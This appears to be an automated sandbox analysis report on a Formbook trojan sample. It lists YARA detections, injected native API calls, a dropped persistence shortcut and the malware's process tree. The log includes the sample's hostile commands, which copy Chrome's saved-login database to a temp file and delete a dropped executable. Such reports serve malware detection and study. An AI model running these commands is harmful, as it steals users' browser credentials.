Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 564, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: rundll32.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Shortcut_HotKey author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Source: C:\Users\Public\Libraries\vrkamxjwJ.url, type: DROPPED Matched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, score = 27.09.2019, reference = https://twitter.com/cglyer/status/1176184798248919044
Detected potential crypto function
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9DBD2 5_2_03C9DBD2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C0EBB0 5_2_03C0EBB0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2B28 5_2_03CA2B28
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA22AE 5_2_03CA22AE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF4120 5_2_03BF4120
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BDF900 5_2_03BDF900
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA28EC 5_2_03CA28EC
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BEB090 5_2_03BEB090
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C020A0 5_2_03C020A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA20A8 5_2_03CA20A8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C91002 5_2_03C91002
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CAE824 5_2_03CAE824
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1FF1 5_2_03CA1FF1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2EF7 5_2_03CA2EF7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BF6E30 5_2_03BF6E30
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D616 5_2_03C9D616
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA25DD 5_2_03CA25DD
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C02581 5_2_03C02581
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BED5E0 5_2_03BED5E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BD0D20 5_2_03BD0D20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA1D55 5_2_03CA1D55
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03CA2D07 5_2_03CA2D07
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03BE841F 5_2_03BE841F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C9D466 5_2_03C9D466
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: String function: 03BDB150 appears 35 times
Contains functionality to call native functions
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A50 NtCreateFile,LdrInitializeThunk, 5_2_03C19A50
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A20 NtResumeThread,LdrInitializeThunk, 5_2_03C19A20
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199A0 NtCreateSection,LdrInitializeThunk, 5_2_03C199A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19910 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_03C19910
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19840 NtDelayExecution,LdrInitializeThunk, 5_2_03C19840
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19860 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03C19860
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19FE0 NtCreateMutant,LdrInitializeThunk, 5_2_03C19FE0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19780 NtMapViewOfSection,LdrInitializeThunk, 5_2_03C19780
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C197A0 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_03C197A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19710 NtQueryInformationToken,LdrInitializeThunk, 5_2_03C19710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196E0 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03C196E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195D0 NtClose,LdrInitializeThunk, 5_2_03C195D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19540 NtReadFile,LdrInitializeThunk, 5_2_03C19540
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A3B0 NtGetContextThread, 5_2_03C1A3B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19B00 NtSetValueKey, 5_2_03C19B00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A80 NtOpenDirectoryObject, 5_2_03C19A80
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A00 NtProtectVirtualMemory, 5_2_03C19A00
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19A10 NtQuerySection, 5_2_03C19A10
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C199D0 NtCreateProcessEx, 5_2_03C199D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19950 NtQueueApcThread, 5_2_03C19950
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198F0 NtReadVirtualMemory, 5_2_03C198F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C198A0 NtWriteVirtualMemory, 5_2_03C198A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1B040 NtSuspendThread, 5_2_03C1B040
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19820 NtEnumerateKey, 5_2_03C19820
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19760 NtOpenProcess, 5_2_03C19760
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A770 NtOpenThread, 5_2_03C1A770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19770 NtSetInformationFile, 5_2_03C19770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1A710 NtOpenProcessToken, 5_2_03C1A710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19730 NtQueryVirtualMemory, 5_2_03C19730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C196D0 NtCreateKey, 5_2_03C196D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19650 NtQueryValueKey, 5_2_03C19650
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19660 NtAllocateVirtualMemory, 5_2_03C19660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19670 NtQueryInformationProcess, 5_2_03C19670
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19610 NtEnumerateValueKey, 5_2_03C19610
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C195F0 NtQueryInformationFile, 5_2_03C195F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19560 NtWriteFile, 5_2_03C19560
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C19520 NtWaitForSingleObject, 5_2_03C19520
Source: C:\Windows\SysWOW64\cmd.exe Code function: 5_2_03C1AD30 NtSetContextThread, 5_2_03C1AD30
Sample file is different than original file name gathered from version info
Source: TR0627729920002.exe, 00000000.00000002.277070452.0000000002930000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.278345155.000000007FCF5000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.257799024.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.277410487.00000000034A0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.237403790.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.237626468.000000007FC97000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000002.279158959.000000007FE68000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.239679096.00000000035D8000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe, 00000000.00000003.239608511.0000000003544000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
Source: TR0627729920002.exe Binary or memory string: OriginalFilename0 vs TR0627729920002.exe
PE file contains strange resources
Source: TR0627729920002.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Jwjxmakrv.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: IconCachet0hh.exe.7.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Tries to load missing DLLs
Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Section loaded: system.dll Jump to behavior
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\P1bxx\IconCachet0hh.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
Source: TR0627729920002.exe ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\TR0627729920002.exe File read: C:\Users\user\Desktop\TR0627729920002.exe Jump to behavior
Source: C:\Users\user\Desktop\TR0627729920002.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\TR0627729920002.exe "C:\Users\user\Desktop\TR0627729920002.exe"
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe"
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe
Source: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TR0627729920002.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\Public\Libraries\Jwjxmakrv.exe "C:\Users\Public\Libraries\Jwjxmakrv.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe C:\Program Files (x86)\P1bxx\IconCachet0hh.exe Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\SysWOW64\cmd.exe"
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Users\user\Desktop\TR0627729920002.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B091E540-83E3-11CF-A713-0020AFD79762}\InProcServer32 Jump to behavior
